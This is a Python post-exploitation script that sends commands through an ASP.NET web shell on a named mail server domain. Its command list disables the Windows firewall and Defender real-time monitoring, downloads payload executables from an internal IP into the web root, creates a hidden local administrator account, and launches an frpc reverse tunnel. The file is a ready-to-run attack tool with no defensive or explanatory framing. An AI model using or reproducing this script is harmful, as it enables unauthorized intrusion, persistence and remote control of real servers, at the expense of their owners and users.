import requests
from bs4 import BeautifulSoup
import ssl
import urllib3
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

commands = [
    'PowerShell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False',
    'PowerShell Set-MpPreference -DisableRealtimeMonitoring $true',
    "powershell (New-Object System.Net.WebClient).DownloadFile('<http://172.30.40.125/attack.zip>', 'C:/inetpub/wwwroot/aspnet_client/attack.zip')",
    "powershell (New-Object System.Net.WebClient).DownloadFile('<http://172.30.40.125/payload.exe>', 'C:/inetpub/wwwroot/aspnet_client/payload.exe')",
    "powershell (New-Object System.Net.WebClient).DownloadFile('<http://172.30.40.125/update.exe>', 'C:/inetpub/wwwroot/aspnet_client/update.exe')",
    'net user /add test 1q2w3e4r!',
    'net localgroup administrators test /add',
    'powershell Expand-Archive -LiteralPath C:/inetpub/wwwroot/aspnet_client/attack.zip -DestinationPath C:/inetpub/wwwroot/aspnet_client',
    'C:/inetpub/wwwroot/aspnet_client/attack/frpc.exe -c C:/inetpub/wwwroot/aspnet_client/attack/frpc.ini'
]

base_url = '<https://mail.marrywithme.com/aspnet_client/webshell.aspx?command=>'

ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE

results = {}

for command in commands:
    url = f'{base_url}Response.Write(new ActiveXObject("Wscript.Shell").exec("{command}").Stdout.ReadAll());'

    response = requests.get(url, verify=False)  # Use boolean False here, not the SSL context

    if response.status_code == 200:
        print(f"Command: '{command}' - Successful")
        results[command] = response.content.decode('utf-8')
        soup = BeautifulSoup(response.content, 'html.parser')
    else:
        print(f"Command: '{command}' - Failed: {response.status_code}")
    time.sleep(3)

print("\\nResults:")
for command, result in results.items():
    print(f"Command: '{command}' - Result: {result}")